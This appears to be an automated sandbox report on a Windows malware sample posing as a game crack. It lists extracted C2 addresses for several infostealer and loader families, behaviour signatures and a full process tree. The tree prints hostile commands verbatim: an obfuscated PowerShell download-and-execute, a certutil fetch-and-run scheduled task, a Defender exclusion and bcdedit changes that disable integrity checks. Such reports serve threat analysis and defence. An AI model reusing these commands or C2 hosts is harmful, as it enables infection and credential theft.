Analysis

  • max time kernel
    157s
  • max time network
    300s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    22-03-2021 09:13

General

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://labsclub.com/welcome

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

cryptbot

C2

basfs12.top

mormsd01.top

Attributes
  • payload_url

    http://akmes01.top/download.php?file=lv.exe

Extracted

Family

raccoon

Botnet

c46f13f8aadc028907d65c627fd9163161661f6c

Attributes
  • url4cnc

    https://telete.in/capibar

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

2ce901d964b370c5ccda7e4d68354ba040db8218

Attributes
  • url4cnc

    https://telete.in/tomarsjsmith3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32
rc4.i32

Extracted

Family

icedid

Campaign

4052159376

C2

house34vegas.uno

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

  • CryptBot Payload 2 IoCs
  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • IcedID First Stage Loader 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Modifies boot configuration data using bcdedit 15 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Looks for VMWare Tools registry key 2 TTPs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 64 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 10 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 18 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 8 IoCs
  • Enumerates system info in registry 2 TTPs 10 IoCs
  • Kills process with taskkill 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 11 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 7 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 31 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe
    "C:\Users\Admin\AppData\Local\Temp\Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:68
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3876
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1940
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:676
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:3968
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:3196
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2668
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:848
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:1452
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1152
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:892
            • C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe
              "C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
              5⤵
                PID:2484
                • C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe
                  "C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe" 1 3.1616404477.60585ffdd96ce 101
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:4408
                  • C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe
                    "C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe" 2 3.1616404477.60585ffdd96ce
                    7⤵
                    • Executes dropped EXE
                    • Checks for any installed AV software in registry
                    • Maps connected drives based on registry
                    • Enumerates system info in registry
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4540
                    • C:\Users\Admin\AppData\Local\Temp\eb4gs3kr2n1\Setup3310.exe
                      "C:\Users\Admin\AppData\Local\Temp\eb4gs3kr2n1\Setup3310.exe" /Verysilent /subid=577
                      8⤵
                      • Executes dropped EXE
                      • Suspicious use of SetWindowsHookEx
                      PID:3120
                      • C:\Users\Admin\AppData\Local\Temp\is-S9MHF.tmp\Setup3310.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-S9MHF.tmp\Setup3310.tmp" /SL5="$10332,138429,56832,C:\Users\Admin\AppData\Local\Temp\eb4gs3kr2n1\Setup3310.exe" /Verysilent /subid=577
                        9⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SetWindowsHookEx
                        PID:2192
                        • C:\Users\Admin\AppData\Local\Temp\is-R61HG.tmp\Setup.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-R61HG.tmp\Setup.exe" /Verysilent
                          10⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4328
                          • C:\Users\Admin\AppData\Local\Temp\is-0VUDC.tmp\Setup.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-0VUDC.tmp\Setup.tmp" /SL5="$2056A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-R61HG.tmp\Setup.exe" /Verysilent
                            11⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetWindowsHookEx
                            PID:4564
                            • C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\Delta.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\Delta.exe" /Verysilent
                              12⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:6532
                              • C:\Users\Admin\AppData\Local\Temp\is-FKQEM.tmp\Delta.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-FKQEM.tmp\Delta.tmp" /SL5="$2054C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\Delta.exe" /Verysilent
                                13⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of SetWindowsHookEx
                                PID:6568
                                • C:\Users\Admin\AppData\Local\Temp\is-0OJR3.tmp\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\is-0OJR3.tmp\Setup.exe" /VERYSILENT
                                  14⤵
                                  • Checks processor information in registry
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2080
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-0OJR3.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
                                    15⤵
                                      PID:7064
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im Setup.exe /f
                                        16⤵
                                        • Kills process with taskkill
                                        PID:6040
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 6
                                        16⤵
                                        • Delays execution with timeout.exe
                                        PID:7132
                              • C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\hjjgaa.exe
                                "C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\hjjgaa.exe" /Verysilent
                                12⤵
                                • Suspicious use of SetWindowsHookEx
                                PID:6472
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  13⤵
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5312
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  13⤵
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5272
                      • C:\Users\Admin\AppData\Local\Temp\qq52m2l3xf5\askinstall24.exe
                        "C:\Users\Admin\AppData\Local\Temp\qq52m2l3xf5\askinstall24.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:3744
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im chrome.exe
                          9⤵
                            PID:6032
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im chrome.exe
                              10⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:6140
                        • C:\Users\Admin\AppData\Local\Temp\bzevo02lcli\IBInstaller_97039.exe
                          "C:\Users\Admin\AppData\Local\Temp\bzevo02lcli\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:5084
                          • C:\Users\Admin\AppData\Local\Temp\is-OFSKF.tmp\IBInstaller_97039.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-OFSKF.tmp\IBInstaller_97039.tmp" /SL5="$1033C,9898950,721408,C:\Users\Admin\AppData\Local\Temp\bzevo02lcli\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:5268
                        • C:\Users\Admin\AppData\Local\Temp\bpsx5satohb\AwesomePoolU1.exe
                          "C:\Users\Admin\AppData\Local\Temp\bpsx5satohb\AwesomePoolU1.exe"
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4124
                        • C:\Users\Admin\AppData\Local\Temp\awh1adz1hcc\vpn.exe
                          "C:\Users\Admin\AppData\Local\Temp\awh1adz1hcc\vpn.exe" /silent /subid=482
                          8⤵
                          • Executes dropped EXE
                          • Suspicious use of SetWindowsHookEx
                          PID:4648
                          • C:\Users\Admin\AppData\Local\Temp\is-QHTSS.tmp\vpn.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-QHTSS.tmp\vpn.tmp" /SL5="$1033A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\awh1adz1hcc\vpn.exe" /silent /subid=482
                            9⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Program Files directory
                            • Modifies system certificate store
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            PID:5192
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                              10⤵
                                PID:6524
                                • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                  tapinstall.exe remove tap0901
                                  11⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious use of SetWindowsHookEx
                                  PID:6808
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                10⤵
                                  PID:4128
                                  • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                    tapinstall.exe install OemVista.inf tap0901
                                    11⤵
                                    • Drops file in System32 directory
                                    • Drops file in Windows directory
                                    • Checks SCSI registry key(s)
                                    • Modifies system certificate store
                                    • Suspicious use of SetWindowsHookEx
                                    PID:5580
                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                  10⤵
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:5948
                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                  10⤵
                                    PID:6484
                              • C:\Users\Admin\AppData\Local\Temp\vssiahy0njg\vict.exe
                                "C:\Users\Admin\AppData\Local\Temp\vssiahy0njg\vict.exe" /VERYSILENT /id=535
                                8⤵
                                • Executes dropped EXE
                                • Suspicious use of SetWindowsHookEx
                                PID:4840
                                • C:\Users\Admin\AppData\Local\Temp\is-IUD5M.tmp\vict.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-IUD5M.tmp\vict.tmp" /SL5="$10338,870426,780800,C:\Users\Admin\AppData\Local\Temp\vssiahy0njg\vict.exe" /VERYSILENT /id=535
                                  9⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Drops file in Program Files directory
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5204
                                  • C:\Users\Admin\AppData\Local\Temp\is-FOFK7.tmp\winhost.exe
                                    "C:\Users\Admin\AppData\Local\Temp\is-FOFK7.tmp\winhost.exe" 535
                                    10⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetWindowsHookEx
                                    PID:6060
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dll"
                                      11⤵
                                        PID:6280
                                        • C:\Windows\SysWOW64\regsvr32.exe
                                          regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dll"
                                          12⤵
                                          • Loads dropped DLL
                                          PID:6504
                                          • C:\Windows\system32\regsvr32.exe
                                            /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dll"
                                            13⤵
                                            • Loads dropped DLL
                                            PID:6540
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dlloyl8C1mF2.dll"
                                        11⤵
                                          PID:6748
                                          • C:\Windows\SysWOW64\regsvr32.exe
                                            regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dlloyl8C1mF2.dll"
                                            12⤵
                                              PID:5844
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                            11⤵
                                              PID:7832
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                12⤵
                                                  PID:7888
                                        • C:\Users\Admin\AppData\Local\Temp\z0vf0hvbfl3\cpb0ufehxrl.exe
                                          "C:\Users\Admin\AppData\Local\Temp\z0vf0hvbfl3\cpb0ufehxrl.exe" /VERYSILENT
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:5160
                                          • C:\Users\Admin\AppData\Local\Temp\is-0Q5R8.tmp\cpb0ufehxrl.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-0Q5R8.tmp\cpb0ufehxrl.tmp" /SL5="$103CA,2592217,780800,C:\Users\Admin\AppData\Local\Temp\z0vf0hvbfl3\cpb0ufehxrl.exe" /VERYSILENT
                                            9⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5352
                                        • C:\Users\Admin\AppData\Local\Temp\ykgpwhqhykg\pcuwnkxw0yo.exe
                                          "C:\Users\Admin\AppData\Local\Temp\ykgpwhqhykg\pcuwnkxw0yo.exe" /ustwo INSTALL
                                          8⤵
                                          • Executes dropped EXE
                                          PID:5148
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "pcuwnkxw0yo.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ykgpwhqhykg\pcuwnkxw0yo.exe" & exit
                                            9⤵
                                              PID:4812
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im "pcuwnkxw0yo.exe" /f
                                                10⤵
                                                • Kills process with taskkill
                                                PID:5856
                                          • C:\Users\Admin\AppData\Local\Temp\yzcamdp10hg\app.exe
                                            "C:\Users\Admin\AppData\Local\Temp\yzcamdp10hg\app.exe" /8-23
                                            8⤵
                                            • Executes dropped EXE
                                            • Drops file in Program Files directory
                                            • Suspicious use of SetWindowsHookEx
                                            PID:5908
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Delicate-Voice"
                                              9⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4356
                                            • C:\Program Files (x86)\Delicate-Voice\7za.exe
                                              "C:\Program Files (x86)\Delicate-Voice\7za.exe" e -p154.61.71.13 winamp-plugins.7z
                                              9⤵
                                              • Drops file in Program Files directory
                                              • Suspicious use of SetWindowsHookEx
                                              PID:6804
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Delicate-Voice\app.exe" -map "C:\Program Files (x86)\Delicate-Voice\WinmonProcessMonitor.sys""
                                              9⤵
                                                PID:7124
                                                • C:\Program Files (x86)\Delicate-Voice\app.exe
                                                  "C:\Program Files (x86)\Delicate-Voice\app.exe" -map "C:\Program Files (x86)\Delicate-Voice\WinmonProcessMonitor.sys"
                                                  10⤵
                                                  • Suspicious behavior: LoadsDriver
                                                  PID:1760
                                              • C:\Program Files (x86)\Delicate-Voice\7za.exe
                                                "C:\Program Files (x86)\Delicate-Voice\7za.exe" e -p154.61.71.13 winamp.7z
                                                9⤵
                                                • Suspicious use of SetWindowsHookEx
                                                PID:6444
                                              • C:\Program Files (x86)\Delicate-Voice\app.exe
                                                "C:\Program Files (x86)\Delicate-Voice\app.exe" /8-23
                                                9⤵
                                                  PID:6332
                                                  • C:\Program Files (x86)\Delicate-Voice\app.exe
                                                    "C:\Program Files (x86)\Delicate-Voice\app.exe" /8-23
                                                    10⤵
                                                      PID:6544
                                                      • C:\Windows\System32\cmd.exe
                                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                        11⤵
                                                          PID:7228
                                                          • C:\Windows\system32\netsh.exe
                                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                            12⤵
                                                              PID:7288
                                                          • C:\Windows\rss\csrss.exe
                                                            C:\Windows\rss\csrss.exe /8-23
                                                            11⤵
                                                              PID:7456
                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                12⤵
                                                                • Creates scheduled task(s)
                                                                PID:5644
                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                                                                12⤵
                                                                • Creates scheduled task(s)
                                                                PID:5576
                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                                                                12⤵
                                                                  PID:8076
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:10796
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:10852
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:10904
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:10956
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:11008
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:11064
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:11124
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:11172
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:11256
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:10896
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:10960
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -timeout 0
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:11008
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:11116
                                                                  • C:\Windows\system32\bcdedit.exe
                                                                    C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
                                                                    13⤵
                                                                    • Modifies boot configuration data using bcdedit
                                                                    PID:4156
                                                                • C:\Windows\System32\bcdedit.exe
                                                                  C:\Windows\Sysnative\bcdedit.exe /v
                                                                  12⤵
                                                                  • Modifies boot configuration data using bcdedit
                                                                  PID:7100
                                                                • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                                                                  12⤵
                                                                    PID:5900
                                                    • C:\Users\Admin\AppData\Local\Temp\8EHEQK4GL1\setups.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\8EHEQK4GL1\setups.exe" ll
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetWindowsHookEx
